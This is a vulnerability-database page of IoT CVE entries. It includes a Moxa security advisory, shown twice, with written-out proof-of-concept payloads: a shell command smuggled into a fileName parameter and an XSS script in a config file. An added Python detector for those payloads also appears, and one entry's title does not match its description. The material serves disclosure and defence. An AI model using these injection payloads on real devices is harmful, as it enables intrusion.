VARIoT IoT vulnerabilities database
| VAR-202108-0238 | CVE-2021-1113 | Jetson Linux improper authentication vulnerability |
CVSS V2: 5.4 CVSS V3: 4.7 Severity: MEDIUM |
NVIDIA camera firmware contains a difficult to exploit vulnerability where a highly privileged attacker can cause unauthorized modification to camera resources, which may result in complete denial of service and partial loss of data integrity for all clients. Jetson Linux contains an improper authentication vulnerability. Information may be tampered with and service operation may be interrupted (DoS).
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202108-0235 | CVE-2021-1110 | NVIDIA Linux kernel distributions on Jetson Xavier input validation vulnerability |
CVSS V2: 6.6 CVSS V3: 7.1 Severity: HIGH |
NVIDIA Linux kernel distributions on Jetson Xavier contain a vulnerability in camera firmware where a user can change input data after validation, which may lead to complete denial of service and serious data corruption of all kernel components.
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202105-0634 | CVE-2021-1521 | Pillow Buffer error vulnerability |
CVSS V2: 6.1 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause an affected IP camera to reload. This vulnerability is due to missing checks when processing Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected IP camera. A successful exploit could allow the attacker to cause the affected IP camera to reload unexpectedly, resulting in a denial of service (DoS) condition. Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202105-0402 | CVE-2021-22679 | Texas Instruments SimpleLink multiple vulnerabilities |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
The affected product is vulnerable to an integer overflow while processing HTTP headers, which may allow an attacker to remotely execute code on the SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments' SimpleLink contains the following multiple vulnerabilities:
* Integer overflow (CWE-190) - CVE-2021-22677
* Stack-based buffer overflow (CWE-121) - CVE-2021-22673
* Integer overflow (CWE-190) - CVE-2021-22675
* Integer overflow (CWE-190) - CVE-2021-22671
* Integer overflow (CWE-190) - CVE-2021-22679
The expected impact depends on each vulnerability, but may be as follows:
* An integer overflow during Wi-Fi connection processing causes a denial of service (DoS) or execution of malicious code - CVE-2021-22677
* A stack-based buffer overflow while updating firmware over-the-air from the CDN server allows a remote third party to execute malicious code - CVE-2021-22673
* An integer overflow when loading a specially crafted firmware update file allows a remote third party to execute malicious code - CVE-2021-22675
* An integer overflow during HTTP header processing allows a remote third party to execute malicious code - CVE-2021-22679
* An integer overflow when processing long domain names allows a remote third party to execute malicious code - CVE-2021-22671
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202105-0401 | CVE-2021-22677 | Texas Instruments SimpleLink multiple vulnerabilities |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
An integer overflow exists in the APIs of the host MCU while trying to connect to a WIFI network and may lead to issues such as a denial-of-service condition or code execution on the SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments' SimpleLink contains the following multiple vulnerabilities:
* Integer overflow (CWE-190) - CVE-2021-22677
* Stack-based buffer overflow (CWE-121) - CVE-2021-22673
* Integer overflow (CWE-190) - CVE-2021-22675
* Integer overflow (CWE-190) - CVE-2021-22671
* Integer overflow (CWE-190) - CVE-2021-22679
The expected impact depends on each vulnerability, but may be as follows:
* An integer overflow during Wi-Fi connection processing causes a denial of service (DoS) or execution of malicious code - CVE-2021-22677
* A stack-based buffer overflow while updating firmware over-the-air from the CDN server allows a remote third party to execute malicious code - CVE-2021-22673
* An integer overflow when loading a specially crafted firmware update file allows a remote third party to execute malicious code - CVE-2021-22675
* An integer overflow during HTTP header processing allows a remote third party to execute malicious code - CVE-2021-22679
* An integer overflow when processing long domain names allows a remote third party to execute malicious code - CVE-2021-22671
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202105-0400 | CVE-2021-22675 | Texas Instruments SimpleLink multiple vulnerabilities |
CVSS V2: 6.5 CVSS V3: 7.2 Severity: HIGH |
The affected product is vulnerable to integer overflow while parsing malformed over-the-air firmware update files, which may allow an attacker to remotely execute code on SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments' SimpleLink contains the following multiple vulnerabilities:
* Integer overflow (CWE-190) - CVE-2021-22677
* Stack-based buffer overflow (CWE-121) - CVE-2021-22673
* Integer overflow (CWE-190) - CVE-2021-22675
* Integer overflow (CWE-190) - CVE-2021-22671
* Integer overflow (CWE-190) - CVE-2021-22679
The expected impact depends on each vulnerability, but may be as follows:
* An integer overflow during Wi-Fi connection processing causes a denial of service (DoS) or execution of malicious code - CVE-2021-22677
* A stack-based buffer overflow while updating firmware over-the-air from the CDN server allows a remote third party to execute malicious code - CVE-2021-22673
* An integer overflow when loading a specially crafted firmware update file allows a remote third party to execute malicious code - CVE-2021-22675
* An integer overflow during HTTP header processing allows a remote third party to execute malicious code - CVE-2021-22679
* An integer overflow when processing long domain names allows a remote third party to execute malicious code - CVE-2021-22671
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202105-0399 | CVE-2021-22673 | Texas Instruments SimpleLink multiple vulnerabilities |
CVSS V2: 6.0 CVSS V3: 8.0 Severity: HIGH |
The affected product is vulnerable to stack-based buffer overflow while processing over-the-air firmware updates from the CDN server, which may allow an attacker to remotely execute code on the SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments' SimpleLink contains the following multiple vulnerabilities:
* Integer overflow (CWE-190) - CVE-2021-22677
* Stack-based buffer overflow (CWE-121) - CVE-2021-22673
* Integer overflow (CWE-190) - CVE-2021-22675
* Integer overflow (CWE-190) - CVE-2021-22671
* Integer overflow (CWE-190) - CVE-2021-22679
The expected impact depends on each vulnerability, but may be as follows:
* An integer overflow during Wi-Fi connection processing causes a denial of service (DoS) or execution of malicious code - CVE-2021-22677
* A stack-based buffer overflow while updating firmware over-the-air from the CDN server allows a remote third party to execute malicious code - CVE-2021-22673
* An integer overflow when loading a specially crafted firmware update file allows a remote third party to execute malicious code - CVE-2021-22675
* An integer overflow during HTTP header processing allows a remote third party to execute malicious code - CVE-2021-22679
* An integer overflow when processing long domain names allows a remote third party to execute malicious code - CVE-2021-22671
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202105-0397 | CVE-2021-22671 | Texas Instruments SimpleLink multiple vulnerabilities |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Multiple integer overflow issues exist while processing long domain names, which may allow an attacker to remotely execute code on the SimpleLink Wi-Fi (MSP432E4 SDK: v4.20.00.12 and prior, CC32XX SDK v4.30.00.06 and prior, CC13X0 SDK versions prior to v4.10.03, CC13X2 and CC26XX SDK versions prior to v4.40.00, CC3200 SDK v1.5.0 and prior, CC3100 SDK v1.3.0 and prior). Texas Instruments' SimpleLink contains the following multiple vulnerabilities:
* Integer overflow (CWE-190) - CVE-2021-22677
* Stack-based buffer overflow (CWE-121) - CVE-2021-22673
* Integer overflow (CWE-190) - CVE-2021-22675
* Integer overflow (CWE-190) - CVE-2021-22671
* Integer overflow (CWE-190) - CVE-2021-22679
The expected impact depends on each vulnerability, but may be as follows:
* An integer overflow during Wi-Fi connection processing causes a denial of service (DoS) or execution of malicious code - CVE-2021-22677
* A stack-based buffer overflow while updating firmware over-the-air from the CDN server allows a remote third party to execute malicious code - CVE-2021-22673
* An integer overflow when loading a specially crafted firmware update file allows a remote third party to execute malicious code - CVE-2021-22675
* An integer overflow during HTTP header processing allows a remote third party to execute malicious code - CVE-2021-22679
* An integer overflow when processing long domain names allows a remote third party to execute malicious code - CVE-2021-22671
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202105-0060 | CVE-2020-11295 | Multiple Qualcomm products use-after-free vulnerability |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Use after free in camera if the threadmanager is being cleaned up while the worker thread is processing objects in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile. Multiple Qualcomm products contain a use-after-free vulnerability. Information may be obtained, information may be tampered with, and service may be disrupted (DoS).
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202105-0145 | CVE-2020-26557 | Devices supporting Bluetooth Core and Mesh Specifications are vulnerable to impersonation attacks and AuthValue disclosure |
CVSS V2: 2.9 CVSS V3: 7.5 Severity: HIGH |
Mesh Provisioning in the Bluetooth Mesh profile 1.0 and 1.0.1 may permit a nearby device (without possession of the AuthValue used in the provisioning protocol) to determine the AuthValue via a brute-force attack (unless the AuthValue is sufficiently random and changed each time). Devices supporting the Bluetooth Core and Mesh Specifications are vulnerable to impersonation attacks and AuthValue disclosure that could allow an attacker to impersonate a legitimate device during pairing.
CVE-2020-26556 Not Affected
Vendor Statement:
Android does not support Bluetooth Mesh so is not vulnerable.
CVE-2020-26555 Affected
Vendor Statement:
Android has assessed this issue as High severity for Android OS and will be issuing a patch for this vulnerability in an upcoming Android security bulletin.
CVE-2020-26557 Not Affected
Vendor Statement:
Android does not support Bluetooth Mesh so is not vulnerable.
CVE-2020-26558 Affected
Vendor Statement:
Android has reviewed this report and assessed this vulnerability as having impact on Android OS. We will be issuing a patch for this vulnerability in an upcoming Android security bulletin.
CVE-2020-26559 Not Affected
Vendor Statement:
Android does not support Bluetooth Mesh so is not vulnerable.
CVE-2020-26560 Not Affected
Vendor Statement:
Android does not support Bluetooth Mesh so is not vulnerable.
VU#799380.5 Affected
Vendor Statement:
Our assessment of this report is that it is of negligible security impact on Android.
The Bluetooth Mesh profile contains an improper authentication vulnerability. Information may be obtained, information may be tampered with, and service may be disrupted (DoS).
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202106-1407 | CVE-2021-23847 | Bosch IP cameras missing authentication for critical function vulnerability |
CVSS V2: 6.4 CVSS V3: 9.1 Severity: CRITICAL |
A Missing Authentication in Critical Function in Bosch IP cameras allows an unauthenticated remote attacker to extract sensitive information or change settings of the camera by sending crafted requests to the device. Only devices of the CPP6, CPP7 and CPP7.3 family with firmware 7.70, 7.72, and 7.80 prior to B128 are affected by this vulnerability. Versions 7.62 or lower and INTEOX cameras are not affected.
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202107-0586 | CVE-2021-1940 | Multiple Qualcomm products use-after-free vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
Use after free can occur due to improper handling of response from firmware in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables. Multiple Qualcomm products contain a use-after-free vulnerability. Information may be obtained, information may be tampered with, and service may be disrupted (DoS).
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202106-1962 | CVE-2021-32934 | ThroughTek P2P SDK cleartext transmission of sensitive information vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
The affected ThroughTek P2P products (SDKs using versions before 3.1.5, any versions with nossl tag, device firmware not using AuthKey for IOTC connection, firmware using AVAPI module without enabling DTLS mechanism, and firmware using P2PTunnel or RDT module) do not sufficiently protect data transferred between the local device and ThroughTek servers. This can allow an attacker to access sensitive information, such as camera feeds. ThroughTek's P2P Software Development Kit (SDK) contains a vulnerability in which sensitive information may be transmitted in plain text. The P2P SDK, a development kit manufactured by ThroughTek, provides the ability to access audio and video streams over the Internet. According to the vendor, data transferred between the device and its servers is not adequately protected, and sensitive information is transmitted in plain text.
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202109-1172 | CVE-2021-39279 | Multiple MOXA devices OS command injection vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
Certain MOXA devices allow Authenticated Command Injection via /forms/web_importTFTP. This affects WAC-2004 1.7, WAC-1001 2.1, WAC-1001-T 2.1, OnCell G3470A-LTE-EU 1.7, OnCell G3470A-LTE-EU-T 1.7, TAP-323-EU-CT-T 1.3, TAP-323-US-CT-T 1.3, TAP-323-JP-CT-T 1.3, WDR-3124A-EU 2.3, WDR-3124A-EU-T 2.3, WDR-3124A-US 2.3, and WDR-3124A-US-T 2.3. Multiple MOXA devices contain an OS command injection vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS).
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.
SEC Consult Vulnerability Lab Security Advisory < 20210901-0 >
=======================================================================
title: Multiple vulnerabilities
product: see "Vulnerable / tested versions"
vulnerable version: see "Vulnerable / tested versions"
fixed version: see "Solution"
CVE number: CVE-2021-39278, CVE-2021-39279
impact: High
homepage: https://www.moxa.com/
found: 2020-08-31
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Together, We Create Change
Moxa is committed to making a positive impact around the world. We put our all
behind this commitment--from our employees, to our products and supply chain.
In our local communities, we nurture and support the spirit of volunteering.
We encourage our employees to contribute to community development, with an
emphasis on ecology, education, and health.
In our products, we invest in social awareness programs and
environment-friendly policies at every stage of the product lifecycle. We make
sure our manufacturing meets the highest standards with regards to quality,
ethics, and sustainability."
Source: https://www.moxa.com/en/about-us/corporate-responsibility
Business recommendation:
------------------------
SEC Consult recommends immediately applying the available patches
from the vendor. A thorough security review should be performed by
security professionals to identify further potential security issues.
Vulnerability overview/description:
-----------------------------------
1) Authenticated Command Injection (CVE-2021-39279)
An authenticated command injection vulnerability can be triggered by issuing a
GET request to the "/forms/web_importTFTP" CGI program which is available on
the web interface. An attacker can abuse this vulnerability to compromise the
operating system of the device. This issue was found by emulating the firmware
of the device.
2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)
Via a crafted config-file, a reflected cross-site scripting vulnerability can
be exploited in the context of the victim's browser. This config-file can be
uploaded to the device via the "Config Import Export" tab in the main menu.
3) Known GNU glibc Vulnerabilities (CVE-2015-0235)
The used GNU glibc in version 2.9 is outdated and contains multiple known
vulnerabilities. One of the discovered vulnerabilities (CVE-2015-0235,
gethostbyname "GHOST" buffer overflow) was verified by using the MEDUSA
scalable firmware runtime.
4) Multiple Outdated Software Components
Multiple outdated software components containing vulnerabilities were found by
the IoT Inspector.
The vulnerabilities 1), 2) and 3) were manually verified on an emulated device
by using the MEDUSA scalable firmware runtime.
Proof of concept:
-----------------
1) Authenticated Command Injection (CVE-2021-39279)
The vulnerability can be triggered by navigating in the web interface to the
tab:
"Main Menu"->"Maintenance"->"Config Import Export"
The "TFTP Import" menu is prone to command injection via all parameters. To
exploit the vulnerability, an IP address, a configuration path and a filename
must be set.
If the filename is used to trigger the exploit, the payload in the interceptor
proxy would be:
http://192.168.1.1/forms/web_importTFTP?servIP=192.168.1.1&configPath=/&fileName=name|`ping localhost -c 100`
2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)
The vulnerability can be triggered by navigating in the web interface to the
tab:
"Main Menu"->"Maintenance"->"Config Import Export"
The "Config Import" menu is prone to reflected cross-site scripting via the
upload of config files. Example of malicious config file:
-------------------------------------------------------------------------------
[board]
deviceName="WAC-2004_0000</span><script>alert(document.cookie)</script>"
deviceLocation=""
[..]
-------------------------------------------------------------------------------
Uploading such a crafted file triggers cross-site scripting as the erroneous
value is displayed without filtering characters.
3) Known GNU glibc Vulnerabilities (CVE-2015-0235)
GNU glibc version 2.9 contains multiple CVEs like:
CVE-2016-1234, CVE-2015-7547, CVE-2013-7423, CVE-2013-1914, and more.
The gethostbyname buffer overflow vulnerability (GHOST) was checked with the
help of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was
compiled and executed on the emulated device to test the system.
4) Multiple Outdated Software Components
The IoT Inspector recognized multiple outdated software components with known
vulnerabilities:
BusyBox 1.18.5 06/2011
Dropbear SSH 2011.54 11/2011
GNU glibc 2.9 02/2009
Linux Kernel 2.6.27 10/2008
OpenSSL 0.9.7g 04/2005
Only found in the program "iw_director"
OpenSSL 1.0.0 03/2010
Vulnerable / tested versions:
-----------------------------
The following firmware versions for various devices have been identified
to be vulnerable:
* WAC-2004 / 1.7
* WAC-1001 / 2.1
* WAC-1001-T / 2.1
* OnCell G3470A-LTE-EU / 1.7
* OnCell G3470A-LTE-EU-T / 1.7
* TAP-323-EU-CT-T / 1.3
* TAP-323-US-CT-T / 1.3
* TAP-323-JP-CT-T / 1.3
* WDR-3124A-EU / 2.3
* WDR-3124A-EU-T / 2.3
* WDR-3124A-US / 2.3
* WDR-3124A-US-T / 2.3
Vendor contact timeline:
------------------------
2020-10-09: Contacting vendor through moxa.csrt@moxa.com.
2020-10-12: Contact sends PGP key for encrypted communication and asks for the
detailed advisory. Sent encrypted advisory to vendor.
2020-11-06: Status update from vendor regarding technical analysis. Vendor
requested more time for fixing the vulnerabilities as more products
are affected.
2020-11-09: Granted more time for fixing to vendor.
2020-11-10: Vendor asked for next steps regarding the advisory publication.
2020-11-11: Asked vendor for an estimation when a public disclosure is possible.
2020-11-16: Vendor responded that the product team can give a rough feedback.
2020-11-25: Asked for a status update.
2020-11-25: Vendor responded that the investigation is not done yet.
2020-12-14: Vendor provided a list of potential affected devices and stated
that full investigation may take until January 2021 due to the list
of CVEs that were provided with the appended IoT Inspector report.
The patches may be available until June 2021.
2020-12-15: Shifted next status update round with vendor on May 2021.
2020-12-23: Vendor provided full list of affected devices.
2021-02-05: Vendor manually sieved out the found issues from 4) and provided a
full list of confirmed vulnerabilities. WAC-2004 was phased out in
2019.
2021-02-21: Confirmed receipt of vulnerabilities, next status update in May
2021.
2021-06-10: Asking for an update.
2021-06-15: Vendor stated that the update will be provided in the next days.
2021-06-21: Vendor will give an update in the next week as Covid gets worse in
Taiwan.
2021-06-23: Vendor stated that patches are under development. Vendor needs more
time to finish the patches.
2021-06-24: Set release date to 2021-09-01.
2021-07-02: Vendor provides status updates.
2021-08-16: Vendor provides status updates.
2021-08-17: Vendor asks for CVE IDs and stated that WDR-3124A has been phased out.
2021-08-20: Sent assigned CVE-IDs to vendor. Asked for fixed version numbers.
2021-08-31: Vendor provides fixed firmware version numbers and the advisory
links.
2021-09-01: Coordinated release of security advisory.
Solution:
---------
According to the vendor, the following patches must be applied to fix the issues:
* WAC-1001 / 2.1.5
* WAC-1001-T / 2.1.5
* OnCell G3470A-LTE-EU / 1.7.4
* OnCell G3470A-LTE-EU-T / 1.7.4
* TAP-323-EU-CT-T / 1.8.1
* TAP-323-US-CT-T / 1.8.1
* TAP-323-JP-CT-T / 1.8.1
The Moxa Technical Support must be contacted for requesting the security
patches.
The corresponding security advisories for the affected devices are available on
the vendor's website:
TAP-323/WAC-1001/WAC-2004
https://www.moxa.com/en/support/product-support/security-advisory/tap-323-wac-1001-2004-wireless-ap-bridge-client-vulnerabilities
OnCell G3470A-LTE/WDR-3124A
https://www.moxa.com/en/support/product-support/security-advisory/oncell-g3470a-wdr-3124a-cellular-gateways-router-vulnerabilities
The following device models are EOL and should be replaced:
* WAC-2004
* WDR-3124A-EU
* WDR-3124A-EU-T
* WDR-3124A-US
* WDR-3124A-US-T
Workaround:
-----------
None.
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Thomas Weber / @2021
| VAR-202109-1171 | CVE-2021-39278 | Multiple MOXA devices cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Certain MOXA devices allow reflected XSS via the Config Import menu. This affects WAC-2004 1.7, WAC-1001 2.1, WAC-1001-T 2.1, OnCell G3470A-LTE-EU 1.7, OnCell G3470A-LTE-EU-T 1.7, TAP-323-EU-CT-T 1.3, TAP-323-US-CT-T 1.3, TAP-323-JP-CT-T 1.3, WDR-3124A-EU 2.3, WDR-3124A-EU-T 2.3, WDR-3124A-US 2.3, and WDR-3124A-US-T 2.3. Multiple MOXA devices contain a cross-site scripting vulnerability. Information may be obtained and information may be tampered with.
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Many Moxa devices suffer from command injection, cross site scripting, and outdated software vulnerabilities. SEC Consult Vulnerability Lab Security Advisory < 20210901-0 >
=======================================================================
title: Multiple vulnerabilities
product: see "Vulnerable / tested versions"
vulnerable version: see "Vulnerable / tested versions"
fixed version: see "Solution"
CVE number: CVE-2021-39278, CVE-2021-39279
impact: High
homepage: https://www.moxa.com/
found: 2020-08-31
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Together, We Create Change
Moxa is committed to making a positive impact around the world. We put our all
behind this commitment--from our employees, to our products and supply chain.
In our local communities, we nurture and support the spirit of volunteering.
We encourage our employees to contribute to community development, with an
emphasis on ecology, education, and health.
In our products, we invest in social awareness programs and
environment-friendly policies at every stage of the product lifecycle. We make
sure our manufacturing meets the highest standards with regards to quality,
ethics, and sustainability."
Source: https://www.moxa.com/en/about-us/corporate-responsibility
Business recommendation:
------------------------
SEC Consult recommends to immediately apply the available patches
from the vendor. A thorough security review should be performed by
security professionals to identify further potential security issues.
Vulnerability overview/description:
-----------------------------------
1) Authenticated Command Injection (CVE-2021-39279)
An authenticated command injection vulnerability can be triggered by issuing a
GET request to the "/forms/web_importTFTP" CGI program which is available on
the web interface. An attacker can abuse this vulnerability to compromise the
operating system of the device. This issue was found by emulating the firmware
of the device.
2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)
The "Config Import" function of the web interface is prone to reflected
cross-site scripting via the upload of a crafted config file, as values taken
from the file are displayed without filtering.
3) Known GNU glibc Vulnerabilities (CVE-2015-0235)
The GNU glibc version 2.9 in use is outdated and contains multiple known
vulnerabilities. One of the discovered vulnerabilities (CVE-2015-0235,
gethostbyname "GHOST" buffer overflow) was verified by using the MEDUSA
scalable firmware runtime.
4) Multiple Outdated Software Components
Multiple outdated software components containing vulnerabilities were found by
the IoT Inspector.
The vulnerabilities 1), 2) and 3) were manually verified on an emulated device
by using the MEDUSA scalable firmware runtime.
Proof of concept:
-----------------
1) Authenticated Command Injection (CVE-2021-39279)
The vulnerability can be triggered by navigating in the web interface to the
tab:
"Main Menu"->"Maintenance"->"Config Import Export"
The "TFTP Import" menu is prone to command injection via all parameters. To
exploit the vulnerability, an IP address, a configuration path and a filename
must be set.
If the filename is used to trigger the exploit, the request seen in the
intercepting proxy would be:
http://192.168.1.1/forms/web_importTFTP?servIP=192.168.1.1&configPath=/&fileName=name|`ping localhost -c 100`
2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)
The vulnerability can be triggered by navigating in the web interface to the
tab:
"Main Menu"->"Maintenance"->"Config Import Export"
The "Config Import" menu is prone to reflected cross-site scripting via the
upload of config files. Example of malicious config file:
-------------------------------------------------------------------------------
[board]
deviceName="WAC-2004_0000</span><script>alert(document.cookie)</script>"
deviceLocation=""
[..]
-------------------------------------------------------------------------------
Uploading such a crafted file triggers cross-site scripting, as the erroneous
value is reflected into the page without filtering or encoding special
characters.
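The following Python example is added here and is not part of the SEC Consult advisory or of Moxa's firmware. It shows the defender's side of issues 1) and 2): an allow-list validator for the three "TFTP Import" parameters, a scanner that flags injection attempts against /forms/web_importTFTP in web-server access logs, and a check of uploaded config files for values that would be reflected unescaped. The parameter names, CGI path and payloads come from the advisory; the Common Log Format, the IP addresses and the character classes are assumptions, and the sample data is constructed.

```python
"""Added example (not from the advisory or Moxa): allow-list validation of the
TFTP import parameters, access-log scanning for injection attempts, and a
check for config values that must not be reflected into HTML unescaped."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Strict allow-lists (assumed policy): a directory path without traversal and a
# plain file name. Anything else is rejected before it can reach a shell.
_PATH_RE = re.compile(r"^/?(?:[A-Za-z0-9._-]+/)*[A-Za-z0-9._-]*$")
_FILE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
# Characters that let a shell start a second command: | ; & ` $( and newlines.
_SHELL_META_RE = re.compile(r"[|;&`\n\r]|\$\(")
# Characters that must never be reflected into HTML without escaping.
_HTML_META = set('<>"&\'')


def validate_tftp_import(params: dict) -> list:
    """Return the reasons a TFTP import request must be rejected (empty = OK)."""
    problems = []
    serv_ip = params.get("servIP", "")
    try:
        ipaddress.ip_address(serv_ip)
    except ValueError:
        problems.append(f"servIP is not an IP address: {serv_ip!r}")
    config_path = params.get("configPath", "")
    # ".." consists of allowed characters, so traversal needs an explicit check.
    if not _PATH_RE.match(config_path) or ".." in config_path.split("/"):
        problems.append(f"configPath rejected: {config_path!r}")
    file_name = params.get("fileName", "")
    if not _FILE_RE.match(file_name):
        problems.append(f"fileName rejected: {file_name!r}")
    return problems


# Assumed Common Log Format: client - user [timestamp] "METHOD target HTTP/x" status size
_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def scan_access_log(lines) -> list:
    """Return (client, timestamp, parameter, decoded value) for every request to
    the TFTP import CGI whose parameter carries shell metacharacters."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/forms/web_importTFTP":
            continue
        # parse_qs percent-decodes, so %7C and %60 become "|" and "`" before matching.
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:
                if _SHELL_META_RE.search(value):
                    hits.append((m.group("src"), m.group("ts"), name, value))
    return hits


def unsafe_config_values(config_text: str) -> list:
    """Return (key, value) pairs of an uploaded config whose value contains HTML
    metacharacters. Reflecting such a value unescaped is the XSS of issue 2);
    the fix is html.escape() on output (or rejecting the upload)."""
    found = []
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[") or "=" not in line:
            continue  # blank line, section header or non key=value line
        key, _, value = line.partition("=")
        value = value.strip().strip('"')
        if _HTML_META & set(value):
            found.append((key.strip(), value))
    return found


# Constructed sample data: two benign requests and one carrying the advisory's
# "ping localhost -c 100" payload in fileName, percent-encoded as a browser would.
SAMPLE_LOG = [
    '10.0.0.5 - admin [01/Sep/2021:10:15:02 +0200] "GET /forms/web_importTFTP?servIP=10.0.0.9&configPath=/&fileName=backup.ini HTTP/1.1" 200 512',
    '10.0.0.77 - admin [01/Sep/2021:10:16:40 +0200] "GET /forms/web_importTFTP?servIP=10.0.0.9&configPath=/&fileName=name%7C%60ping%20localhost%20-c%20100%60 HTTP/1.1" 200 512',
    '10.0.0.5 - admin [01/Sep/2021:10:17:11 +0200] "GET /home.asp HTTP/1.1" 200 2048',
]
SAMPLE_CONFIG = (
    '[board]\n'
    'deviceName="WAC-2004_0000</span><script>alert(document.cookie)</script>"\n'
    'deviceLocation=""\n'
)

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("command injection attempt:", hit)
    for key, value in unsafe_config_values(SAMPLE_CONFIG):
        print("unsafe config value:", key, "=", value)
    print("validator:", validate_tftp_import({"servIP": "10.0.0.9", "configPath": "/", "fileName": "backup.ini"}))
```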
3) Known GNU glibc Vulnerabilities (CVE-2015-0235)
GNU glibc version 2.9 contains multiple CVEs like:
CVE-2016-1234, CVE-2015-7547, CVE-2013-7423, CVE-2013-1914, and more.
